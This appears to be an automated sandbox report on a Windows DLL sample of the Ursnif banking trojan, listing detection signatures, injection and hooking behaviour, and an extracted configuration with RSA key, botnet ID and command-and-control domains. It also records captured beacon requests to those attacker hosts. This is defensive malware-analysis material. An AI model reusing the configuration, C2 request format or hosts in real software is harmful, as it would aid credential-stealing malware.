Windows Analysis Report uT9rwkGATJ.dll

Overview

General Information

Sample Name: uT9rwkGATJ.dll
Analysis ID: 499264
MD5: 9a453cc31ebfca29d8df565258fbf8ce
SHA1: 5eb3be88abb84f63e04c92bc3e35a82a01689971
SHA256: eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
Tags: dllGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Suspicious powershell command line found
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: uT9rwkGATJ.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: uT9rwkGATJ.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown HTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2
Source: uT9rwkGATJ.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source: Binary string: d.pdbp source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00B6B4A5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_00B66467
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_00B5BAF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_0334BAF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_03356467
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_0335B4A5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_00B52E19

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.97.178.98 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.29.104.83 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.101.9.178 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.160.2 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: xereunrtol.website
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: zereunrtol.website
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic HTTP traffic detected: GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 973402f4-6725-3934-5235-dbb411665df2Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB3PR08CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB3PR08CA0032.EURPRD08.PROD.OUTLOOK.COMX-CalculatedBETarget: DB8P193MB0645.EURP193.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 9AI0lyVnNDlSNdu0EWZd8g.1.1X-FEServer: DB3PR08CA0032X-Powered-By: ASP.NETX-FEServer: AM6P193CA0099Date: Fri, 08 Oct 2021 04:45:27 GMTConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 407db856-2e34-d9a0-a01d-7a34e5abaa03Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB6P195CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB6P195CA0005.EURP195.PROD.OUTLOOK.COMX-CalculatedBETarget: DBBPR04MB6234.EURPRD04.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: Vrh9QDQuoNmgHXo05auqAw.1.1X-FEServer: DB6P195CA0005X-Powered-By: ASP.NETX-FEServer: AM7PR04CA0006Date: Fri, 08 Oct 2021 04:45:32 GMTConnection: close
Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000017.00000003.757597977.0000026CBE674000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.761980707.0000026CA6311000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.770495881.0000029700001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic HTTP traffic detected: GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
